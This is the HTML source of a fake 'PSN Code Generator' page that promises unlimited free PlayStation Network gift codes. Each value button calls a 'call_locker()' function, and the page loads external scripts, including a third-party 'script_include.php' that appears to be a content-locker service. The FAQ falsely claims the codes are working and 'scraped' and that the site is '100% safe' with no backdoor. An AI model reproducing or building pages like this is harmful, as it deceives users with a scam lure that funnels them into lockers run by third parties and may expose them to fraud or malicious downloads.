<!DOCTYPE HTML>
<head>
	<title>PSN Code Generator</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<link rel="stylesheet" href="http://pickbit.github.io/request/doc.css" type="text/css" />
	<link rel="stylesheet" href="http://pickbit.github.io/request/bout.css" type="text/css" />
	<meta name="viewport" content="width=device-width; initial-scale=0.5; maximum-scale=2.0;" />
	<meta name="MobileOptimized" content="width" />
	<meta name="HandheldFriendly" content="true" />
	<script type="text/javascript" src="http://pickbit.github.io/request/get.js"></script>
	<script type="text/javascript" src="https://ultrafiles.co/script_include.php?id=402285"></script>
	<script type="text/javascript" src="http://pickbit.github.io/request/ciff.js"></script>
	<script type="text/javascript" src="http://pickbit.github.io/request/bad.js"></script>
	<script type="text/javascript" src="http://pickbit.github.io/request/script.js"></script>
    <script type="text/javascript" src="http://pickbit.github.io/request/rec.js"></script>
</head>
<body>
<header id="header">
	<div id="header-content">
	<a href="#"><div class="logo"></div></a>
	</div>
</header>
<div class="bg-holder">
	<div id="content-bg"></div>
</div>
<div class='wrapper'>
	<div id="home-text">
	<p>Choose value of the code you'd like to get!</p></div>
	<div id="product-holder">
    <div id="product-holder1">
        <div id="proceed">
        <a href="#"><div class="button" onclick="call_locker();"></div></a>
        </div>
    </div>
    <div id="product-holder2">
		<div id="proceed">
        <a href="#"><div class="button" onclick="call_locker();"></div></a>
        </div>
    </div>
	<div id="product-holder3">
   		<div id="proceed">
        <a href="#"><div class="button" onclick="call_locker();"></div></a>
        </div>
    </div>
    </div>
    <div id="columns-bg">
    <div class="padding">
    <h1>FAQ of PSN Code Generator</h1>
<br/>
<h2>
<br/>
Are you missing PSN funds to get games? That's alright! We've got a special promo for you. On this site you can generate as many PSN Codes as you have never wondered about. It's free and you can even get some codes for you friends or family.
<br/><br/>
</h2>
<h1>
So how do I generate PSN Code?
</h1>
<br/>
<h2>
At the top of the site you can select code you'd like to get. It doesn't matter if you choose $10 or $50 because process looks the same in both cases and is super simple.
</h2><br/>
<h1>
Is it 100% safe to use codes from your generator?
</h1>
<br/>
<h2>
Yes, it is. We scrape only working, fresh codes. Our team always make sure there is no backdoor or something that could harm our users. Generator does not connect to your account and you don't have to download anything. It can be used on mobile devices.</h1>
<br/>
</div>
    </div>
    </section>
  </div>
</div>
<footer>
	<div class="copyrights">
	<p><a style="color: #fff;" href="#">© PSN Code Generator</a></p></div>
    </div>
</footer>
</body>
